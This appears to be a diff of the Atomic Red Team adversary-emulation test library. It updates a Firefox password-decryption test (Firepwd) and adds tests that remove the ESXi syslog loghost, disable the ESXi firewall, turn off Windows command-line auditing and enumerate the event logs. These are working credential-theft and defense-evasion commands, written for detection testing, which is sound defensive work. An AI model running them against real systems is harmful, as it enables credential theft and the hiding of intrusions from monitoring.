-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip -v) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+py -m venv "#{venv_path}"
+```
+##### Description: Firepwd must exist at #{Firepwd_Path}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
 ```
 ##### Description: Pycryptodome library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pycryptodome) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
 ```
 ##### Description: Pyasn1 library must be installed
 ##### Check Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (pip show pyasn1) {exit 0} else {exit 1}
+if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
 ```


@@ -200,13 +200,15 @@ atomic_tests:
  description: |
    Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
    Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
  supported_platforms:
  - windows
  input_arguments:
    Firepwd_Path:
      description: Filepath for Firepwd.py
      type: string
-      default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
    Out_Filepath:
      description: Filepath to output results to
      type: string
@@ -219,15 +221,12 @@ atomic_tests:
      description: Filepath to python
      type: string
      default: C:\Program Files\Python310\python.exe
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
  dependency_executor_name: powershell
  dependencies:
-  - description: |
-      Firepwd must exist at #{Firepwd_Path}
-    prereq_command: |
-      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
  - description: |
      Firefox profile directory must be present
    prereq_command: |
@@ -257,37 +256,35 @@ atomic_tests:
      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
  - description: |
-      Pip must be installed.
+      Computer must have venv configured at #{venv_path}
    prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip -v) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      py -m venv "#{venv_path}"
+  - description: |
+      Firepwd must exist at #{Firepwd_Path}
+    prereq_command: |
+      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
  - description: |
      Pycryptodome library must be installed 
    prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pycryptodome) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
    get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+      if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
  - description: |
      Pyasn1 library must be installed 
    prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pyasn1) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
    get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+      if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
  executor:
    name: powershell
    command: |
      $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-      cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+      cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
      cat #{Out_Filepath}
    cleanup_command: |
      Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue   
@@ -28,6 +28,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi

 - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64)

+- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip)
+

 <br/>

@@ -501,4 +503,85 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};



+<br/>
+<br/>
+
+## Atomic Test #10 - ESXi - Remove Syslog remote IP
+An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 36c62584-d360-41d6-886f-d194654be7c2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | Username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Extract line with IP address from the syslog configuration output
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+
+# Replace the IP with "0"
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+
+# Extract the IP from the line extracted from findstr
+$inputFilePath = "c:\temp\loghost.txt"
+$outputFilePath = "c:\temp\loghost_ip.txt"
+
+$fileContent = Get-Content -Path $inputFilePath -Raw
+
+if ([string]::IsNullOrWhiteSpace($fileContent)) {
+    Write-Host "The content is $fileContent"
+    Write-Host "The file is empty"
+} else {
+    # Use a regular expression to extract IP addresses
+    $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+    
+    $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+    $output | Out-File -FilePath $outputFilePath -Encoding ascii
+    
+    Write-Host "IP addresses extracted and saved to $outputFilePath"
+}
+```
+
+#### Cleanup Commands:
+```powershell
+# Re-add the initially extracted IP
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+
+rm c:\temp\loghost_ip.txt
+rm c:\temp\loghost.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
@@ -315,5 +315,73 @@ atomic_tests:
    cleanup_command: 'rm -rf #{input_folder}'
    name: bash
    elevation_required: false
+- name: ESXi - Remove Syslog remote IP
+  auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2
+  description: |
+    An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM.
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: Username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      # Extract line with IP address from the syslog configuration output
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_get_loghost.txt | findstr /r "[0-9]*\.[0-9]*\.[0-9]*\." > c:\temp\loghost.txt
+      
+      # Replace the IP with "0"
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1560.001\src\esxi_remove_loghost.txt
+      
+      # Extract the IP from the line extracted from findstr
+      $inputFilePath = "c:\temp\loghost.txt"
+      $outputFilePath = "c:\temp\loghost_ip.txt"
+
+      $fileContent = Get-Content -Path $inputFilePath -Raw
+
+      if ([string]::IsNullOrWhiteSpace($fileContent)) {
+          Write-Host "The content is $fileContent"
+          Write-Host "The file is empty"
+      } else {
+          # Use a regular expression to extract IP addresses
+          $ipAddresses = [regex]::Matches($fileContent, '(udp|tcp):\/\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value
+          
+          $output = "esxcli system syslog config set --loghost=" + $ipAddresses
+
+          $output | Out-File -FilePath $outputFilePath -Encoding ascii
+          
+          Write-Host "IP addresses extracted and saved to $outputFilePath"
+      }
+
+    cleanup_command: |
+      # Re-add the initially extracted IP
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt
+      
+      rm c:\temp\loghost_ip.txt
+      rm c:\temp\loghost.txt
+    name: powershell
+    elevation_required: true

  
@@ -0,0 +1 @@
+esxcli system syslog config get
@@ -0,0 +1 @@
+esxcli system syslog config set --loghost=0
@@ -1,4 +1,4 @@
-# T1562.003 - Impair Defenses: HISTCONTROL
+# T1562.003 - Impair Defenses: Impair Command History Logging
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/003)
 <blockquote>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 

@@ -32,6 +32,10 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te

 - [Atomic Test #10 - Setting the HISTIGNORE environment variable](#atomic-test-10---setting-the-histignore-environment-variable)

+- [Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe](#atomic-test-11---disable-windows-command-line-auditing-using-regexe)
+
+- [Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet](#atomic-test-12---disable-windows-command-line-auditing-using-powershell-cmdlet)
+

 <br/>

@@ -415,4 +419,103 @@ unset HISTIGNORE



+<br/>
+<br/>
+
+## Atomic Test #11 - Disable Windows Command Line Auditing using reg.exe
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+  Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+echo Commencing Attack - Disabling Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+echo Commencing Cleanup - Restoring Registry Value
+reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Disable Windows Command Line Auditing using Powershell Cmdlet
+In Windows operating systems, command line auditing is controlled through the following registry value:
+
+  Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+  Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+  Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+  Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+Read more here:
+https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+echo "Commencing Attack - Disabling Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+#### Cleanup Commands:
+```powershell
+echo "Commencing Cleanup - Restoring Registry Value"
+New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -1,5 +1,5 @@
 attack_technique: T1562.003
-display_name: 'Impair Defenses: HISTCONTROL'
+display_name: 'Impair Defenses: Impair Command History Logging'
 atomic_tests:
 - name: Disable history collection
  auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
@@ -204,3 +204,66 @@ atomic_tests:
      # -> History cache is empty
    cleanup_command: |
      unset HISTIGNORE
+
+- name: Disable Windows Command Line Auditing using reg.exe
+  auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+  description: |
+    In Windows operating systems, command line auditing is controlled through the following registry value:
+    
+      Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+      Registry Value: ProcessCreationIncludeCmdLine_Enabled
+    
+    When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+    This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+    By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+    Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+    
+    Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+      Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+      Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+    Read more here:
+    https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+  supported_platforms:
+  - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      echo Commencing Attack - Disabling Registry Value
+      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      echo Commencing Cleanup - Restoring Registry Value
+      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+- name: Disable Windows Command Line Auditing using Powershell Cmdlet
+  auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+  description: |
+    In Windows operating systems, command line auditing is controlled through the following registry value:
+    
+      Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+      Registry Value: ProcessCreationIncludeCmdLine_Enabled
+    
+    When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+    This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+    By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+    Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+    
+    Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+      Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+      Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+    Read more here:
+    https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+    https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      echo "Commencing Attack - Disabling Registry Value"
+      New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+    cleanup_command: |
+      echo "Commencing Cleanup - Restoring Registry Value"
+      New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
+      
@@ -50,6 +50,8 @@ Modifying or disabling a system firewall may enable adversary C2 communications,

 - [Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall](#atomic-test-22---blackbit---disable-windows-firewall-using-netsh-firewall)

+- [Atomic Test #23 - ESXi - Disable Firewall via Esxcli](#atomic-test-23---esxi---disable-firewall-via-esxcli)
+

 <br/>

@@ -967,4 +969,57 @@ netsh firewall set opmode mode=enable >nul 2>&1



+<br/>
+<br/>
+
+## Atomic Test #23 - ESXi - Disable Firewall via Esxcli
+Adversaries may disable the ESXI firewall via ESXCLI
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bac8a340-be64-4491-a0cc-0985cb227f5a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
+| plink_file | Path to Putty | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
+| username | username used to log into ESXi | string | root|
+| password | password used to log into ESXI | string | n/a|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+```
+
+#### Cleanup Commands:
+```cmd
+#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The plink executable must be found in the ExternalPayloads folder.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+```
+
+
+
+
 <br/>
@@ -439,3 +439,42 @@ atomic_tests:
      netsh firewall set opmode mode=enable >nul 2>&1
    name: command_prompt
    elevation_required: true
+- name: ESXi - Disable Firewall via Esxcli
+  auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+  description: |
+    Adversaries may disable the ESXI firewall via ESXCLI
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    plink_file:
+      description: Path to Putty
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    username:
+      description: username used to log into ESXi
+      type: string
+      default: root
+    password:
+      description: password used to log into ESXI
+      type: string
+      default: n/a
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The plink executable must be found in the ExternalPayloads folder.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt
+    cleanup_command: |
+      #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt
+    name: command_prompt
+    elevation_required: false
@@ -0,0 +1 @@
+esxcli network firewall set --enabled false
@@ -0,0 +1 @@
+esxcli network firewall set --enabled true
@@ -10,6 +10,8 @@ Adversaries may also target centralized logging infrastructure such as SIEMs. Lo

 - [Atomic Test #1 - Get-EventLog To Enumerate Windows Security Log](#atomic-test-1---get-eventlog-to-enumerate-windows-security-log)

+- [Atomic Test #2 - Enumerate Windows Security Log via WevtUtil](#atomic-test-2---enumerate-windows-security-log-via-wevtutil)
+

 <br/>

@@ -47,4 +49,37 @@ powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore"



+<br/>
+<br/>
+
+## Atomic Test #2 - Enumerate Windows Security Log via WevtUtil
+WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. 
+
+By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
+as well as any custom logs created by administrators. 
+
+This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fef0ace1-3550-4bf1-a075-9fea55a778dd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wevtutil enum-logs
+```
+
+
+
+
+
+
 <br/>
@@ -17,3 +17,17 @@ atomic_tests:
    cleanup_command: powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore"
    name: powershell
    elevation_required: true
+- name: Enumerate Windows Security Log via WevtUtil
+  auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+  description: |- 
+    WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. 
+  
+    By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
+    as well as any custom logs created by administrators. 
+  
+    This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration
+  supported_platforms:
+  - windows
+  executor:
+    command: wevtutil enum-logs
+    name: command_prompt
@@ -1561,3 +1561,23 @@ eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
 6a5b2a50-d037-4879-bf01-43d4d6cbf73f
 4099086c-1470-4223-8085-8186e1ed5948
+b385996c-0e7d-4e27-95a4-aca046b119a7
+ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+940db09e-80b6-4dd0-8d4d-7764f89b47a8
